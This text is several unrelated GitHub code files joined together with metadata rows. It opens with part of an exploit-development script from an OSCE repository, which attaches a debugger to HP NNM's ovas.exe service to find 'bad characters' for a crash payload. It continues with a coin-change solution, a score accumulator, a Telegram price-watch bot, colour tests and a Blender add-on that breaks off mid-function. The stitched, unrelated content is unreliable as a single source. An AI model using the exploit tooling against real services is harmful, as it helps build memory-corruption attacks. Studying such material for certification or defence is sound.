def is_service_responsive():
    # check if service responds to HTTP requests
    """Probe the service with a benign formatted request (up to 5 attempts).
    Returns True on any response, False after 5 failures.

    NOTE(review): indentation reconstructed -- the retry counter is assumed to
    increment once per loop iteration (mirroring is_service_started). Also
    note the socket is not closed on the True/exception paths.
    """
    print("[+] making sure the service responds to HTTP requests...")
    service_check_counter = 0
    while not service_is_running:
        # give it 5 attempts
        if service_check_counter > 4:
            return False
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect(("127.0.0.1", 7510))
            test_str = request_template.format("127.0.0.1")
            sock.send(test_str)
            # give response 1 second to arrive
            sock.settimeout(1.0)
            resp = sock.recv(1024)
            if resp:
                return True
            sock.close()
        except Exception as e:
            print(e)
        service_check_counter += 1
def restart_service():
    # restart ovas.exe service and return its PID
    """Kill any running ovas.exe, restart it via ovstop/ovstart, and verify it
    is both listed in the process table and answering HTTP; recurses until
    both checks pass. Returns the new PID and sets service_is_running."""
    global service_is_running
    service_is_running = False
    # check that the service is running before stopping it
    for process in wmi.WMI().Win32_Process():
        if process.Name == 'ovas.exe':
            print("[+] stopping the service...")
            # forcefully terminate the process
            subprocess.Popen('taskkill /f /im ovas.exe').communicate()
    print("[+] starting the service...")
    # start the process with reliability
    subprocess.Popen('ovstop -c ovas').communicate()
    subprocess.Popen('ovstart -c ovas').communicate()
    pid = is_service_started()
    if pid:
        print("[+] the service was restarted.")
    else:
        print("[-] service was not found in process list. Restarting...")
        return restart_service()
    if is_service_responsive():
        print("[+] service responds to HTTP requests. Green ligth.")
        service_is_running = True
        return pid
    else:
        print("[-] service does not respond to HTTP requests. Restarting...")
        return restart_service()
def check_char(raw_data):
    """Classify the current test character as good or bad.

    Compares the bytes read back from process memory (`raw_data`) against
    the 4-byte pattern that was sent; a mismatch means the character was
    mangled in transit and is therefore a bad character. Results are
    appended to the module-global `good_chars`/`bad_chars` lists and
    persisted to text files after every check.
    NOTE(review): `dbg`, `cur_char` and `chars_to_str` are module globals
    defined elsewhere in the file.
    """
    # compare the buffer sent with the one in memory to see if it has been mangled in order to identify bad characters.
    global bad_chars, good_chars
    hex_data = dbg.hex_dump(raw_data)
    print("[+] buffer: {}".format(hex_data))
    # sent data must be equal to data in memory
    if raw_data == (cur_char * 4):
        good_chars.append(cur_char)
        print("[+] char {} is good.".format(chars_to_str(cur_char)))
        print("[+] good chars so far: {}.".format(chars_to_str(good_chars)))
        # rewrite the whole list each time so progress survives a crash
        with open("good_chars.txt", 'w') as f:
            f.write(chars_to_str(good_chars))
    else:
        bad_chars.append(cur_char)
        print("[+] char {} is bad.".format(chars_to_str(cur_char)))
        print("[+] bad chars so far: {}.".format(chars_to_str(bad_chars)))
        with open("bad_chars.txt", 'w') as f:
            f.write(chars_to_str(bad_chars))
    return
def _access_violation_handler(dbg):
    """pydbg callback fired on an access violation in the target process.

    Reads the pointer stored at [ESP + 0x4C] (which points at the sent test
    buffer), dereferences it for 4 bytes, and hands the bytes to check_char()
    to decide whether the current test character survived intact. Detaches
    the debugger afterwards so the service can be restarted.
    """
    # on access violation read data from a pointer on the stack to determine if the sent buffer was mangled in any way
    print("[+] Access violation caught.")
    # [ESP + 0x4C] points to our test buffer
    esp_offset = 0x4C
    buf_address = dbg.read(dbg.context.Esp + esp_offset, 0x4)
    buf_address = dbg.flip_endian_dword(buf_address)
    print("[+] [DEBUG] buf_address: {}".format(buf_address))
    if buf_address:
        # read 4 bytes test buffer
        buffer = dbg.read(buf_address, 0x4)
        print("[+] buffer is " + buffer)
    else:
        # now when the first request sent is the one for checking if the
        # service responds, the buf_address sometimes returns 0. This is to
        # handle that case.
        buffer = ""
    print("[+] checking whether the char is good or bad...")
    check_char(buffer)
    dbg.detach()
    return DBG_EXCEPTION_NOT_HANDLED
def debug_process(pid):
    """Create a pydbg debugger, register the access-violation callback and
    attach it to the given ovas PID.

    Returns the debugger instance on a successful attach, False otherwise.
    """
    debugger = pydbg()
    debugger.set_callback(EXCEPTION_ACCESS_VIOLATION, _access_violation_handler)
    try:
        print("[+] attaching debugger to pid: {}.".format(pid))
        if debugger.attach(pid):
            return debugger
        return False
    except Exception as e:
        print("[+] error while attaching: {}.".format(e.message))
        return False
if __name__ == '__main__':
    # create and start crasher thread
    # (crash_service and evil_str_sent are defined earlier in this file)
    crasher_thread = threading.Thread(target=crash_service)
    crasher_thread.setDaemon(0)
    crasher_thread.start()
    print("[+] thread started")
    # main loop: restart the service, attach the debugger, and let the
    # crasher thread trigger the access violation; repeats after each crash
    while True:
        pid = restart_service()
        print("[+] restart_service " + str(pid))
        dbg = debug_process(pid)
        print("[+] dbg started")
        if dbg:
            # tell crasher thread to send malicious input to process
            evil_str_sent = False
            # enter the debugging loop (blocks until detach/crash)
            dbg.run()
| bigb0sss/OSCE | hp_nnm7.5/bad_char.py | bad_char.py | py | 10,022 | python | en | code | 74 | github-code | 50 |
42577913058 |
from queue import PriorityQueue
import bisect
import sys
class Solution:
    """Classic coin-change: fewest coins summing to a target amount."""

    def coinChange(self, coins, amount):
        """Return the minimum number of coins from `coins` (unlimited supply)
        that sum exactly to `amount`, or -1 if no combination exists.

        Replaces the original best-first search over a PriorityQueue, which
        revisited the same partial sums exponentially often (no visited set)
        and wrote progress spam to stdout, with bottom-up dynamic programming
        in O(amount * len(coins)) time and O(amount) space. Results are
        identical: 0 for amount 0, -1 when unreachable.
        """
        # dp[a] = fewest coins summing to a; amount + 1 acts as "infinity"
        # since no valid solution can use more than `amount` coins.
        INF = amount + 1
        dp = [0] + [INF] * amount
        for target in range(1, amount + 1):
            for coin in coins:
                # skip non-positive coins defensively; a zero coin could
                # never reduce the remaining amount
                if 0 < coin <= target and dp[target - coin] + 1 < dp[target]:
                    dp[target] = dp[target - coin] + 1
        return dp[amount] if dp[amount] < INF else -1
# Ad-hoc smoke checks, executed on import/run. Expected: 3 and 20.
# print(Solution().coinChange([1,2,5],11))
print(Solution().coinChange([186,419,83,408],6249))
print(Solution().coinChange([1,2,5,10],18)) | RamonRomeroQro/ProgrammingPractice | code/generating-paths.py | generating-paths.py | py | 821 | python | en | code | 1 | github-code | 50 |
29775654337 | # ID-Fits
# Copyright (c) 2015 Institut National de l'Audiovisuel, INA, All rights reserved.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3.0 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library.
import numpy as np
class ScoresAccumulator:
    """Accumulate per-label scores over time, smoothing each contribution
    with a Gaussian kernel so a score observed at time t also reinforces
    neighbouring time steps.
    """

    def __init__(self, max_size=int(1e3)):
        # label -> score curve of length max_size + 2*width; the array is
        # padded by `width` on each side so kernel writes never go out of
        # bounds at the sequence edges.
        self.accumulator = {}
        self.max_size = max_size
        self.width = 20
        # FIX: the kernel must span offsets [-width, width] (2*width + 1
        # taps) to match the slice of length 2*width + 1 written by
        # addScores(). The original np.arange(width, width+1) produced a
        # single-element kernel, degenerating the smoothing to a constant.
        self.kernel = self._gaussian_kernel(np.arange(-self.width, self.width + 1), sigma=10.0)

    def _gaussian_kernel(self, r, sigma):
        """Normalized Gaussian density evaluated at offsets r."""
        return np.exp(-0.5 * (r / sigma)**2) / (np.sqrt(2*np.pi)*sigma)

    def addScores(self, scores, t):
        """Add (label, score) pairs observed at time t, spread by the kernel."""
        for label, score in scores:
            if label not in self.accumulator:
                self.accumulator[label] = np.zeros((self.max_size + 2*self.width))
            # slice length 2*width + 1 matches the kernel length
            self.accumulator[label][t:t+2*self.width+1] += score * self.kernel

    def getAccumulator(self):
        """Return [(label, score_curve), ...] for all labels seen so far."""
        # dict.items() works on both Python 2 and 3 (iteritems() was Py2-only)
        return list(self.accumulator.items())

    def getBestLabels(self, tmin=0, tmax=-1):
        """Return the sorted labels that are the top-scoring label for at
        least 8 time steps in [0, tmax).

        NOTE(review): tmin is accepted but not used by the loop below —
        preserved as-is from the original implementation.
        """
        if tmax == -1:
            tmax = self.max_size
        if len(self.accumulator) == 0:
            return []
        l = list(self.accumulator.items())
        best_labels = []
        for t in range(tmax):
            # pick the label with the highest accumulated score at time t
            label, _ = sorted(l, key=lambda x: x[1][t+self.width], reverse=True)[0]
            best_labels.append(label)
        best_labels2 = []
        for label in set(best_labels):
            if best_labels.count(label) >= 8:
                best_labels2.append(label)
        return sorted(best_labels2)

    def getLabelsScores(self, labels, tmin=0, tmax=-1):
        """Return the score curves for `labels`, restricted to [tmin, tmax)."""
        if tmax == -1:
            tmax = self.max_size
        return [self.accumulator[label][self.width+tmin:self.width+tmax] for label in labels]
| ina-foss/ID-Fits | lib/scores_accumulator.py | scores_accumulator.py | py | 2,297 | python | en | code | 7 | github-code | 50 |
2936876007 | from time import sleep
from threading import Thread
from unicodedata import numeric
import requests
import uuid
from threading import Barrier
import creds
import webbrowser
import telebot
from telebot import types
from telebot.types import InlineKeyboardButton, InlineKeyboardMarkup
import os
import re
import urllib
from bs4 import BeautifulSoup
import pyrebase
import firebase_admin
from firebase_admin import credentials
from firebase_admin import firestore
from firebase_admin import storage
import yagmail
import smtplib
from email.mime.text import MIMEText
from datetime import date
# --- module configuration and shared clients -------------------------------
# Whether to mirror every Telegram notification to e-mail as well.
NOTIFICA_EMAIL = True
# Credentials are kept out of the repo in the local creds module.
SENDING_EMAIL_USERNAME = creds.SENDING_EMAIL_USERNAME
SENDING_EMAIL_PASSWORD = creds.SENDING_EMAIL_PASSWORD
# Seconds between automatic re-check passes (see the *CheckThread classes).
TIMEOUT = 300
debug = False
# Firebase Admin (Firestore) client.
cred = credentials.Certificate(creds.PATH)
firebase_admin.initialize_app(cred)
db = firestore.client()
API_KEY = creds.API_KEY
# Pyrebase client used for Storage (HTML snapshots of watched pages).
firebase = pyrebase.initialize_app(creds.firebaseConfig)
auth = firebase.auth()
storage = firebase.storage()
storagePath = "Soups/"
bot = telebot.TeleBot(API_KEY)
# Browser-like headers so scraped sites don't reject the requests.
HEADERS = ({'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36',
            'Content-Type': 'application/json',
            })
def get_soup(url):
    """Fetch `url` and return a parsed BeautifulSoup tree.

    On a non-OK HTTP status the status code is printed and None is returned.
    """
    response = requests.get(url, headers=HEADERS)
    if not response.ok:
        print(response.status_code)
        return None
    parsed = BeautifulSoup(response.content, 'html.parser')
    parsed.prettify()
    return parsed
def get_html(url):
    """Fetch `url` and return its HTML normalized for change detection.

    Strips <script> and <meta> tags plus volatile attributes (CSP nonces,
    Google CDN URLs) so that two snapshots of an unchanged page compare
    equal. Returns None (implicitly) on a non-OK response.
    """
    response = requests.get(url, headers=HEADERS)
    if response.ok:
        soup = BeautifulSoup(response.content, 'html.parser')
        soup.prettify()
        # drop tags whose content churns on every request
        for s in soup.select('script'):
            s.extract()
        for m in soup.select('meta'):
            m.extract()
        soupString = str(soup).replace('\r','')
        # remove per-request CSP nonces and rotating Google-hosted asset URLs
        soupString = re.sub(r"nonce=\"[-a-zA-Z0-9@:%._\+~#=]+?\"",'', soupString )
        soupString = re.sub(r"=\"https:\/\/lh\d\.googleusercontent\.com\/.+?\"",'', soupString )
        soupString = re.sub(r"=\"https:\/\/www\.gstatic.+?\"",'', soupString )
        return soupString
    else:
        print(response.status_code)
def urlCheck(message):
    """Return True if one of the first three entities of a Telegram message
    is a URL, False otherwise (including messages without entities).

    The original indexed entities[0], [1] and [2] directly, relying on a
    bare except to swallow the IndexError for short entity lists, and fell
    through returning None when three or more non-URL entities were present.
    Callers only test truthiness, so returning an explicit False is
    backward compatible.
    """
    try:
        return any(entity.type == "url" for entity in message.entities[:3])
    except Exception:
        # message.entities may be None or missing entirely
        return False
def nomeEsistente(nome, utente):
    """True if this user already registered a site under the given name."""
    matches = (db.collection('Utente-Sito')
                 .where("utente", "==", utente)
                 .where("nome", "==", nome)
                 .get())
    return len(matches) > 0
def truncate_url(url):
    """Strip the scheme and an optional 'www.' prefix, returning the host.

    Raises AttributeError when `url` does not look like an http(s) URL
    (re.search returns None), matching the original behaviour.
    """
    pattern = r"https?:\/\/(www\.)?([-a-zA-Z0-9@:%._\+~#=]{1,256}\.\w+)\/?"
    match = re.search(pattern, url)
    return match.group(2)
def uploadHtml(url, nomeCustom):
    """Register a website for change-watching.

    `url` and `nomeCustom` are Telegram message objects: `url.text` holds
    the site URL, `nomeCustom.text` the user-chosen display name. If the
    site was never seen before, a normalized HTML snapshot is uploaded to
    Firebase Storage and a 'Sito' document created. Returns True when a new
    user->site link was added, False if this user already watches the URL;
    returns None (implicitly) when `url` is not a URL message.
    """
    if urlCheck(url):
        # try:
        urlSito = url.text
        utente = url.chat.id
        html = get_html(urlSito)
        #troncato = truncate_url(urlSito)
        s = db.collection('Sito').where("url", "==", urlSito).get()
        if len(s) == 0: # site not yet known to anyone: store a snapshot
            # random storage id so URLs never collide with filesystem rules
            nomeFile = uuid.uuid4().hex
            fh = open(nomeFile, "w", encoding="utf-8")
            fh.write(html)
            fh.close()
            storage.child(storagePath + nomeFile).put(nomeFile)
            today = date.today()
            data = str(today.strftime("%d/%m/%y"))
            db.collection('Sito').add({'url': urlSito, 'storageid': nomeFile, 'data':data})
            # best-effort cleanup of the local temp file
            try:
                os.unlink(nomeFile)
            except Exception as e:
                print(e)
        us = db.collection('Utente-Sito').where("utente", "==", utente).where("sito", "==", urlSito).get()
        if len(us)==0: # this user had not registered the site yet
            db.collection('Utente-Sito').add({'utente':utente, 'sito':urlSito, 'nome': nomeCustom.text})
            return True
        return False
    # except Exception as e:
    #     bot.reply_to(message, str(e))
def prezzoAbbassato(prodotto, obiettivo):
    """Return the product's new price if it dropped below both the user's
    target (`obiettivo`) and the last stored price, persisting the new
    price to Firestore; otherwise return -1.
    """
    nuovoPrezzo = getProductprice(prodotto)
    prodObj = db.collection('Prodotto').where('id', '==', prodotto).get()[0]
    oldPrezzo = prodObj.get('prezzo')
    if nuovoPrezzo < obiettivo and nuovoPrezzo < oldPrezzo:
        key = prodObj.id
        # record the lower price so future checks compare against it
        db.collection('Prodotto').document(key).update({'prezzo':nuovoPrezzo})
        return nuovoPrezzo
    return -1
def paginaCambiata(url, storageId):
    """Return True if the page at `url` differs from its stored snapshot.

    Downloads the previous snapshot from Firebase Storage, compares it to
    a fresh normalized fetch, and on a change: dumps both versions locally
    ("Vecchiosito"/"Nuovosito" for manual diffing), updates the 'Sito'
    document's date, and uploads the new snapshot.
    """
    newSoup = get_html(url)
    storage.child(storagePath + storageId).download("", storageId)
    fh=open(storageId, 'r', encoding="utf-8")
    oldSoup = fh.read()
    fh.close()
    if newSoup == oldSoup:
        # unchanged: just clean up the downloaded temp file
        try:
            os.unlink(storageId)
        except Exception as e:
            print(e)
        return False
    else:
        # keep local copies of both versions for inspection
        fh = open("Vecchiosito", "w", encoding='utf-8')
        fh.write(oldSoup)
        fh.close()
        fh2 = open("Nuovosito", "w", encoding='utf-8')
        fh2.write(newSoup)
        fh2.close()
        # stamp the change date on the site's Firestore document
        today = date.today()
        data = str(today.strftime("%d/%m/%y"))
        key = db.collection('Sito').where('url', '==', url).get()[0].id
        db.collection('Sito').document(key).update({'data': data})
        # replace the stored snapshot with the new version
        handler = open(storageId, 'w', encoding='utf-8')
        handler.write(newSoup)
        handler.close()
        storage.child(storagePath + storageId).put(storageId)
        try:
            os.unlink(storageId)
        except Exception as e:
            print(e)
        return True
def avvisaUtenteSito(utente, url, nomeSito):
    """Notify a user (Telegram + optional e-mail) that a watched site changed.

    `utente` is the Telegram chat id, also used as the 'nome' key of the
    user's 'Utente' document to look up the e-mail address.
    """
    bot.send_message(utente, f"Il sito memorizzato come '{nomeSito}' ha subito dei cambiamenti: \n" + url)
    dbUser = db.collection('Utente').where('nome', '==', utente).get()[0]
    mailAddress = dbUser.get('email')
    oggetto = "Cambiamento pagine"
    contenuto = f"Il sito memorizzato come '{nomeSito}' ha subito dei cambiamenti: \n" + url
    # e-mail is only sent when enabled globally and the user has an address
    if NOTIFICA_EMAIL and mailAddress!="":
        inviaEmail(mailAddress,oggetto, contenuto)
def avvisaUtenteProdotto(user, prodotto, nomeProd, nuovoPrezzo):
    """Notify a user (Telegram + optional e-mail) that a product's price
    dropped to `nuovoPrezzo` (a float such as 12.5).

    The price is reformatted with a comma decimal separator for display.
    NOTE(review): a fractional part of exactly '0' becomes ',00', but other
    single-digit fractions are kept as-is (12.5 renders as '12,5', not
    '12,50') — quirk preserved from the original.
    """
    pattern = "(\d+)\.(\d+)"
    euro = str(re.search(pattern,str(nuovoPrezzo)).group(1))
    centesimi = str(re.search(pattern,str(nuovoPrezzo)).group(2))
    if centesimi == "0":
        nuovoPrezzo = euro + ",00"
    else:
        nuovoPrezzo = f"{euro},{centesimi}"
    oggetto = "Abbassamento di prezzo"
    contenuto = f"Il prezzo del prodotto da te memorizzato come '{nomeProd}' si è abbassato a {nuovoPrezzo}€ \n" + prodotto
    bot.send_message(user, contenuto)
    dbUser = db.collection('Utente').where('nome', '==', user).get()[0]
    mailAddress = dbUser.get('email')
    if NOTIFICA_EMAIL and mailAddress!="":
        inviaEmail(mailAddress, oggetto, contenuto)
def checkAutomaticoSito():
    """Scan every registered user->site link, detect changed pages, and
    notify every user watching a changed URL.

    Each URL is checked once per pass (paginaCambiata updates the stored
    snapshot), then notifications fan out over the user links.
    """
    utenteSito = db.collection('Utente-Sito').get()
    sitiCambiati = []
    for sito in utenteSito:
        urlSito = sito.get('sito')
        s = db.collection('Sito').where('url',"==",urlSito).get()
        storageid = s[0].get('storageid')
        if paginaCambiata(urlSito, storageid):
            sitiCambiati.append(urlSito)
    # second pass: alert every user whose watched URL changed
    for utente in utenteSito:
        urlSalvato = utente.get('sito')
        user = utente.get('utente')
        nomeSito = utente.get('nome')
        if urlSalvato in sitiCambiati:
            avvisaUtenteSito(user, urlSalvato, nomeSito)
def checkAutomaticoProdotto():
    """Scan every registered user->product link, re-fetch prices, and notify
    every user whose product dropped below their target price.
    """
    utenteProdotto = db.collection('Utente-Prodotto').where('utente', "!=", "").get()
    prodottiAbbassati = {}
    for prodotto in utenteProdotto:
        urlProdotto = prodotto.get('prodotto')
        obiettivo = prodotto.get('obiettivo')
        nuovoPrezzo = prezzoAbbassato(urlProdotto, obiettivo)
        # prezzoAbbassato returns -1 when the price did not drop
        if nuovoPrezzo != -1:
            prodottiAbbassati[urlProdotto] = nuovoPrezzo
    # second pass: alert every user watching a lowered product
    for utente in utenteProdotto:
        prodotto = utente.get('prodotto')
        user = utente.get('utente')
        nomeProd = utente.get('nome')
        if prodotto in prodottiAbbassati:
            nuovoPrezzo = prodottiAbbassati[prodotto]
            avvisaUtenteProdotto(user, prodotto, nomeProd, nuovoPrezzo)
def inviaEmail(destinatario, oggetto, contenuto):
    """Send an e-mail (recipient, subject, body) from the configured account."""
    smtp_client = yagmail.SMTP(SENDING_EMAIL_USERNAME, SENDING_EMAIL_PASSWORD)
    smtp_client.send(destinatario, oggetto, contenuto)
def priceConverter(strPrice):
    """Parse the first number found in a price string into a float.

    '.' is treated as a thousands separator and stripped; ',' is the
    decimal separator and becomes '.'. Note the regex only captures one
    separator group, so "1.234,56" parses as 1234.0 (the ',56' is not
    captured) — behaviour preserved from the original.

    Raises AttributeError when no digits are found, exactly as before.

    Fix: the original wrapped the conversion in a try/except whose handler
    re-ran the identical failing re.search, so the except branch could
    never succeed; that dead path has been removed.
    """
    pricePattern = r"(\d+((\.|\,)\d+)?)"
    match = re.search(pricePattern, strPrice)
    numeric_price = match.group(1).replace(".", "").replace(",", ".")
    return float(numeric_price)
def productListKeyboard(message):
    """Build an inline Telegram keyboard listing the user's watched products.

    One button per unique product URL, labelled "<name> (<price>€)" with the
    stored price reformatted to a comma decimal separator.
    NOTE(review): the local name `dict` shadows the builtin — kept as-is.
    """
    dict = {}
    docs = db.collection("Utente-Prodotto").where("utente", "==", message.chat.id).get()
    keyboard = []
    for doc in docs:
        Prodotto = db.collection('Prodotto').where('id','==', doc.get('prodotto')).get()[0]
        # split the stored float price into euros / fractional part
        pattern = "(\d+)\.(\d+)"
        prezzo = str(Prodotto.get('prezzo'))
        euro = str(re.search(pattern,prezzo).group(1))
        centesimi = str(re.search(pattern,prezzo).group(2))
        if centesimi == "0":
            prezzo = euro + ",00"
        else:
            prezzo = f"{euro},{centesimi}"
        if doc.get('prodotto') not in dict: #unique
            dict[doc.get('prodotto')] = f"{doc.get('nome')} ({prezzo}€)"
    if len(dict) > 0:
        for k in dict.keys():
            # each button opens the product URL directly
            tempButton = InlineKeyboardButton(text = dict[k], url = k)
            keyboard.append([tempButton])
    return keyboard
def websitesListKeyboard(message):
    """Build an inline Telegram keyboard listing the user's watched sites.

    One button per unique site URL, labelled "<name> - [<last change date>]".
    NOTE(review): the local name `dict` shadows the builtin — kept as-is.
    """
    dict = {}
    docs = db.collection("Utente-Sito").where("utente", "==", message.chat.id).get()
    keyboard = []
    for doc in docs:
        if doc.get('sito') not in dict: #unique
            docData = db.collection('Sito').where('url', '==', doc.get('sito')).get()[0]
            data = docData.get('data')
            dict[doc.get('sito')] =f"{doc.get('nome')} - [{data}]"
    if len(dict) > 0:
        for k in dict.keys():
            # each button opens the watched site directly
            tempButton = InlineKeyboardButton(text = dict[k], url = k)
            keyboard.append([tempButton])
    return keyboard
def getProductprice(urlProd):
    """Scrape the current price of a product page as a float.

    Dispatches on the URL (Amazon/amzn, Subito, Zalando, ePrice) to the
    site-specific CSS selector holding the price, then parses the text with
    priceConverter(). Raises Exception for unsupported shops.
    NOTE(review): the hashed class names (Subito/Zalando) are fragile and
    break whenever those sites redeploy their frontend.
    """
    soup = get_soup(urlProd)
    price = "prezzo non trovato"
    patternAmazon = "amazon\.\w+\/.+"
    patternAmazon2 = "https?:\/\/amzn\.\w+/.+"
    patternSubito = "subito\.it\/\w+"
    patternZalando = "zalando\.it/\w+"
    patternEprice = "eprice\.it/\w+"
    if re.search(patternAmazon, str(urlProd)) or re.search(patternAmazon2, str(urlProd)):
        price = soup.find('span', class_="a-offscreen").get_text()
    elif re.search(patternSubito, str(urlProd)):
        price = soup.find('p', class_="index-module_price__N7M2x AdInfo_ad-info__price__tGg9h index-module_large__SUacX").get_text()
    elif re.search(patternZalando, str(urlProd)):
        price = soup.find('p', class_="RYghuO uqkIZw ka2E9k uMhVZi FxZV-M pVrzNP").get_text()
    elif re.search(patternEprice, str(urlProd)):
        price = soup.find('ins', class_="itemPrice").get_text()
    else:
        raise Exception("Prezzo non trovato")
    numeric_price = priceConverter(price)
    return numeric_price
class pageCheckThread(Thread):
    """Background worker that re-checks all watched pages every TIMEOUT seconds."""
    def __init__(self):
        super().__init__()
    def run(self):
        # runs forever; intended to live for the whole process lifetime
        while True:
            checkAutomaticoSito()
            sleep(TIMEOUT)
class productCheckThread(Thread):
    """Background worker that re-checks all watched product prices every TIMEOUT seconds."""
    def __init__(self):
        super().__init__()
    def run(self):
        # runs forever; intended to live for the whole process lifetime
        while True:
            checkAutomaticoProdotto()
            sleep(TIMEOUT)
| lorenzopiro/GeronimoBot | functions.py | functions.py | py | 11,817 | python | it | code | 1 | github-code | 50 |
4591513762 | from colour_palette.colour import Colour
def test_complementary_colour():
    """Complement of a colour inverts each RGB channel."""
    black, white = Colour(0, 0, 0), Colour(255, 255, 255)
    assert black == white.complementary_colour()
    assert white == black.complementary_colour()

    # primaries map to their secondary counterparts
    assert Colour(0, 255, 255) == Colour(255, 0, 0).complementary_colour()   # red -> cyan
    assert Colour(255, 0, 255) == Colour(0, 255, 0).complementary_colour()   # green -> magenta
    assert Colour(255, 255, 0) == Colour(0, 0, 255).complementary_colour()   # blue -> yellow
def test_triadic_colours():
    """Triadic palette contains the base colour plus its two 120° rotations."""
    primary_triad = Colour(255, 0, 0).triadic_colours()
    for expected in (Colour(255, 0, 0), Colour(0, 0, 255), Colour(0, 255, 0)):
        assert expected in primary_triad

    mixed_triad = Colour(49, 206, 143).triadic_colours()
    for expected in (Colour(49, 206, 143), Colour(206, 143, 49), Colour(143, 49, 206)):
        assert expected in mixed_triad
def test_analogous_colours():
    """Analogous palette contains the base colour and its two neighbours."""
    base = Colour(33, 66, 222)
    analogous = base.analogous_colours()
    assert base in analogous
    assert Colour(94, 33, 222) in analogous
    # Ever so slightly different to some other calculators out there;
    # assuming this uses a different number of degrees of rotation.
    assert Colour(33, 160, 222) in analogous
def test_split_complementary_colours():
    """Split-complementary palette has exactly three members: the base
    colour plus the two colours adjacent to its complement."""
    base = Colour(0, 0, 255)
    palette = base.split_complementary()
    assert len(palette) == 3
    for expected in (base, Colour(255, 128, 0), Colour(128, 255, 0)):
        assert expected in palette
def test_rgb_to_hex():
    """hex() renders each channel as two hexadecimal digits.

    Fix over the original: the variable named `blue` was bound to
    (0, 255, 0) and `green` to (0, 0, 255) — the assertions were correct
    but the local names were swapped; they now match the colours.
    """
    black = Colour(0, 0, 0)
    assert black.hex() == '#000000'
    white = Colour(255, 255, 255)
    assert white.hex().lower() == '#FFFFFF'.lower()
    red = Colour(255, 0, 0)
    assert red.hex().lower() == '#FF0000'.lower()
    green = Colour(0, 255, 0)
    assert green.hex().lower() == '#00FF00'.lower()
    blue = Colour(0, 0, 255)
    assert blue.hex().lower() == '#0000FF'.lower()
    silver = Colour(192, 192, 192)
    assert silver.hex().lower() == '#C0C0C0'.lower()
| anishpatelwork/colour-palette-calculator | tests/test_colour.py | test_colour.py | py | 2,961 | python | en | code | 0 | github-code | 50 |
24005442897 | '''
BEGIN GPL LICENSE BLOCK
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software Foundation,
Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
END GPL LICENSE BLOCK
#============================================================================
tp_arch_tool_v000.py (Three Point Arch Tool)
Install instructions:
1) Save the tp_arch_tool_v000.py file to your computer.
2) In Blender, go to File > User Preferences > Add-ons
3) Press Install From File and select the tp_arch_tool_v000.py file you
just downloaded.
4) Enable the Add-On by clicking on the box to the left of Add-On's name
#============================================================================
Stage 0 = Add-on just launched, no points placed
Stage 1 = 1st point placed
Stage 2 = 2nd point placed (1st to 2nd point is arc width)
Stage 3 = 3rd point placed (to create planar surface to align arc to)
Stage 4 = 1st arch edge created
Stage 5 = Make faces from 1st arch (with extrude > scale)
Stage 6 = Make arch faces into solid (by extruding faces from Stage 5)
Stage 7 = Exit add-on
Extras
* Option to change edges on arch (pause with space to break modal?)
* Option to manually set distance between arch edges (spacebar pause menu?)
* Option to "roll back" arch distance?
* Option to add "base/support wall" before creating arch?
* Option to change arch types (circular, equilateral, parabolic, etc)
* Use curves instead of vertex plotting?
'''
# Add-on registration metadata consumed by Blender's add-on manager.
bl_info = {
    "name": "Three Point Arch Tool",
    "author": "nBurn",
    "version": (0, 0, 0),
    "blender": (2, 7, 7),
    "location": "View3D",
    "description": "Tool for creating arches",
    "category": "Mesh"
}
import bpy
import bmesh
import bgl
import blf
from copy import deepcopy
from math import pi, sqrt, degrees, radians, sin, cos
from mathutils import geometry, Euler, Quaternion, Vector
from mathutils.geometry import intersect_line_line_2d
from bpy_extras import view3d_utils
#from bpy_extras.view3d_utils import location_3d_to_region_2d
from bpy_extras.view3d_utils import location_3d_to_region_2d as loc_3d_to_2d
#print("\n\n Loaded: Arc Tool\n") # debug
# Vector component indices (X, Y, Z) and point-find mode constants.
(
    X,
    Y,
    Z,
    XO_SLOW3DTO2D,
    XO_GRABONLY,
) = range(5)
# (region, rv3d) pair of the active 3D View; populated by getreg_rv3d().
reg_rv3d = ()
# The temporary "guide point" object created by create_snap_pt().
pt_store = ()
def getreg_rv3d():
    """Cache the active 3D View's (region, region_data) pair in the module
    global `reg_rv3d` for the 3D->2D projection helpers."""
    global reg_rv3d
    context = bpy.context
    reg_rv3d = (context.region, context.region_data)
class Colr:
    """RGBA colour constants used by the OpenGL draw callbacks."""
    red   = (1.0, 0.0, 0.0, 0.5)
    green = (0.0, 1.0, 0.0, 0.5)
    blue  = (0.0, 0.0, 1.0, 0.5)
    white = (1.0, 1.0, 1.0, 1.0)
    grey  = (1.0, 1.0, 1.0, 0.4)
class RotationData:
    """Bundle of rotation parameters: an axis-lock string ('X'/'Y'/'Z' or
    '' for arbitrary axis) and the pivot-plane normal vector."""
    def __init__(self, ax=None, piv_norm=()):
        self.axis_lk = ax
        self.piv_norm = piv_norm
def backup_snap_settings():
    """Snapshot the scene's snap settings so they can be restored on exit."""
    tool_settings = bpy.context.tool_settings
    return [
        deepcopy(tool_settings.use_snap),
        deepcopy(tool_settings.snap_element),
        deepcopy(tool_settings.snap_target),
    ]
def restore_snap_settings(backup):
    """Restore the snap settings captured by backup_snap_settings()."""
    tool_settings = bpy.context.tool_settings
    tool_settings.use_snap = deepcopy(backup[0])
    tool_settings.snap_element = deepcopy(backup[1])
    tool_settings.snap_target = deepcopy(backup[2])
    return
def get_rotated_pt(piv_co, mov_co, ang_diff_rad, rot_dat):
    """Rotate mov_co around piv_co by ang_diff_rad radians.

    NOTE(review): axis_lk is hardcoded to '' (the rot_dat.axis_lk read is
    commented out), so only the arbitrary-axis Quaternion branch ever runs;
    the Euler branches are currently dead code.
    """
    axis_lk = ''
